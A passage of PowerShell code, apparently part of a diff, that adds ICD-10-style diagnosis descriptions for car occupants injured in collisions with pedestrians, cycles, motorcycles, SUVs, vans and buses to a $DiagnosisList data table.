or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident","Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident","Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident","Unspecified car occupant injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedestrian or animal","Person boarding or alighting a car injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedestrian or animal","Person boarding or alighting a car injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedestrian or animal","Person boarding or alighting a car injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in traffic accident","Car driver injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in traffic accident","Car driver injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedestrian or animal in traffic accident","Car driver injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in traffic accident","Car passenger injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in traffic accident","Car passenger injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedestrian or animal in traffic accident","Car passenger injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in traffic accident","Person on outside of car injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in traffic accident","Person on outside of car injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedestrian or animal in traffic accident","Person on outside of car injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in traffic accident","Unspecified car occupant injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in traffic accident","Unspecified car occupant injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedestrian or animal in traffic accident","Unspecified car occupant injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in nontraffic accident","Car driver injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in nontraffic accident","Car driver injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in nontraffic accident","Car driver injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in nontraffic accident","Car passenger injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in nontraffic accident","Car passenger injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in nontraffic accident","Car passenger injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in nontraffic accident","Person on outside of car injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in nontraffic accident","Person on outside of car injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in nontraffic accident","Person on outside of car injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in nontraffic accident","Unspecified car occupant injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in nontraffic accident","Unspecified car occupant injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in nontraffic accident","Unspecified car occupant injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedal cycle","Person boarding or alighting a car injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedal cycle","Person boarding or alighting a car injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pedal cycle","Person boarding or alighting a car injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in traffic accident","Car driver injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in traffic accident","Car driver injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pedal cycle in traffic accident","Car driver injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in traffic accident","Car passenger injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in traffic accident","Car passenger injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pedal cycle in traffic accident","Car passenger injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in traffic accident","Person on outside of car injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in traffic accident","Person on outside of car injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pedal cycle in traffic accident","Person on outside of car injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in traffic accident","Unspecified car occupant injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in traffic accident","Unspecified car occupant injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pedal cycle in traffic accident","Unspecified car occupant injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a car injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Car passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident","Person on outside of car injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified car occupant injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in nontraffic accident","Car driver injured in collision with sport utility vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in nontraffic accident","Car driver injured in collision with sport utility vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in nontraffic accident","Car driver injured in collision with sport utility vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in nontraffic accident","Car driver injured in collision with other type car in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in nontraffic accident","Car driver injured in collision with other type car in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in nontraffic accident","Car driver injured in collision with other type car in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in nontraffic accident","Car driver injured in collision with pick-up truck in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in nontraffic accident","Car driver injured in collision with pick-up truck in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in nontraffic accident","Car driver injured in collision with pick-up truck in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in nontraffic accident","Car driver injured in collision with van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in nontraffic accident","Car driver injured in collision with van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in nontraffic accident","Car driver injured in collision with van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in nontraffic accident","Car passenger injured in collision with sport utility vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in nontraffic accident","Car passenger injured in collision with sport utility vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in nontraffic accident","Car passenger injured in collision with sport utility vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in nontraffic accident","Car passenger injured in collision with other type car in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in nontraffic accident","Car passenger injured in collision with other type car in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in nontraffic accident","Car passenger injured in collision with other type car in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up in nontraffic accident","Car passenger injured in collision with pick-up in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up in nontraffic accident","Car passenger injured in collision with pick-up in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up in nontraffic accident","Car passenger injured in collision with pick-up in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in nontraffic accident","Car passenger injured in collision with van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in nontraffic accident","Car passenger injured in collision with van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in nontraffic accident","Car passenger injured in collision with van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in nontraffic accident","Person on outside of car injured in collision with sport utility vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in nontraffic accident","Person on outside of car injured in collision with sport utility vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in nontraffic accident","Person on outside of car injured in collision with sport utility vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in nontraffic accident","Person on outside of car injured in collision with other type car in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in nontraffic accident","Person on outside of car injured in collision with other type car in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in nontraffic accident","Person on outside of car injured in collision with other type car in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in nontraffic accident","Person on outside of car injured in collision with pick-up truck in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in nontraffic accident","Person on outside of car injured in collision with pick-up truck in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in nontraffic accident","Person on outside of car injured in collision with pick-up truck in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in nontraffic accident","Person on outside of car injured in collision with van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in nontraffic accident","Person on outside of car injured in collision with van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in nontraffic accident","Person on outside of car injured in collision with van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident","Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident","Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident","Unspecified car occupant injured in collision with sport utility vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in nontraffic accident","Unspecified car occupant injured in collision with other type car in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in nontraffic accident","Unspecified car occupant injured in collision with other type car in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in nontraffic accident","Unspecified car occupant injured in collision with other type car in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in nontraffic accident","Unspecified car occupant injured in collision with pick-up truck in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in nontraffic accident","Unspecified car occupant injured in collision with pick-up truck in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in nontraffic accident","Unspecified car occupant injured in collision with pick-up truck in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in nontraffic accident","Unspecified car occupant injured in collision with van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in nontraffic accident","Unspecified car occupant injured in collision with van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in nontraffic accident","Unspecified car occupant injured in collision with van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with sport utility vehicle","Person boarding or alighting a car injured in collision with sport utility vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with sport utility vehicle","Person boarding or alighting a car injured in collision with sport utility vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with sport utility vehicle","Person boarding or alighting a car injured in collision with sport utility vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other type car","Person boarding or alighting a car injured in collision with other type car, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other type car","Person boarding or alighting a car injured in collision with other type car, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with other type car","Person boarding or alighting a car injured in collision with other type car, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pick-up truck","Person boarding or alighting a car injured in collision with pick-up truck, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pick-up truck","Person boarding or alighting a car injured in collision with pick-up truck, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with pick-up truck","Person boarding or alighting a car injured in collision with pick-up truck, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with van","Person boarding or alighting a car injured in collision with van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with van","Person boarding or alighting a car injured in collision with van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a car injured in collision with van","Person boarding or alighting a car injured in collision with van, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in traffic accident","Car driver injured in collision with sport utility vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in traffic accident","Car driver injured in collision with sport utility vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with sport utility vehicle in traffic accident","Car driver injured in collision with sport utility vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in traffic accident","Car driver injured in collision with other type car in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in traffic accident","Car driver injured in collision with other type car in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with other type car in traffic accident","Car driver injured in collision with other type car in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in traffic accident","Car driver injured in collision with pick-up truck in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in traffic accident","Car driver injured in collision with pick-up truck in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with pick-up truck in traffic accident","Car driver injured in collision with pick-up truck in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in traffic accident","Car driver injured in collision with van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in traffic accident","Car driver injured in collision with van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with van in traffic accident","Car driver injured in collision with van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in traffic accident","Car passenger injured in collision with sport utility vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in traffic accident","Car passenger injured in collision with sport utility vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with sport utility vehicle in traffic accident","Car passenger injured in collision with sport utility vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in traffic accident","Car passenger injured in collision with other type car in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in traffic accident","Car passenger injured in collision with other type car in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with other type car in traffic accident","Car passenger injured in collision with other type car in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up truck in traffic accident","Car passenger injured in collision with pick-up truck in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up truck in traffic accident","Car passenger injured in collision with pick-up truck in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with pick-up truck in traffic accident","Car passenger injured in collision with pick-up truck in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in traffic accident","Car passenger injured in collision with van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in traffic accident","Car passenger injured in collision with van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with van in traffic accident","Car passenger injured in collision with van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in traffic accident","Person on outside of car injured in collision with sport utility vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in traffic accident","Person on outside of car injured in collision with sport utility vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with sport utility vehicle in traffic accident","Person on outside of car injured in collision with sport utility vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in traffic accident","Person on outside of car injured in collision with other type car in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in traffic accident","Person on outside of car injured in collision with other type car in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with other type car in traffic accident","Person on outside of car injured in collision with other type car in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in traffic accident","Person on outside of car injured in collision with pick-up truck in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in traffic accident","Person on outside of car injured in collision with pick-up truck in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with pick-up truck in traffic accident","Person on outside of car injured in collision with pick-up truck in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in traffic accident","Person on outside of car injured in collision with van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in traffic accident","Person on outside of car injured in collision with van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with van in traffic accident","Person on outside of car injured in collision with van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in traffic accident","Unspecified car occupant injured in collision with sport utility vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in traffic accident","Unspecified car occupant injured in collision with sport utility vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with sport utility vehicle in traffic accident","Unspecified car occupant injured in collision with sport utility vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in traffic accident","Unspecified car occupant injured in collision with other type car in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in traffic accident","Unspecified car occupant injured in collision with other type car in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with other type car in traffic accident","Unspecified car occupant injured in collision with other type car in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in traffic accident","Unspecified car occupant injured in collision with pick-up truck in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in traffic accident","Unspecified car occupant injured in collision with pick-up truck in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with pick-up truck in traffic accident","Unspecified car occupant injured in collision with pick-up truck in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in traffic accident","Unspecified car occupant injured in collision with van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in traffic accident","Unspecified car occupant injured in collision with van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified car occupant injured in collision with van in traffic accident","Unspecified car occupant injured in collision with van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Car driver injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Car passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident","Person on outside of car injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null 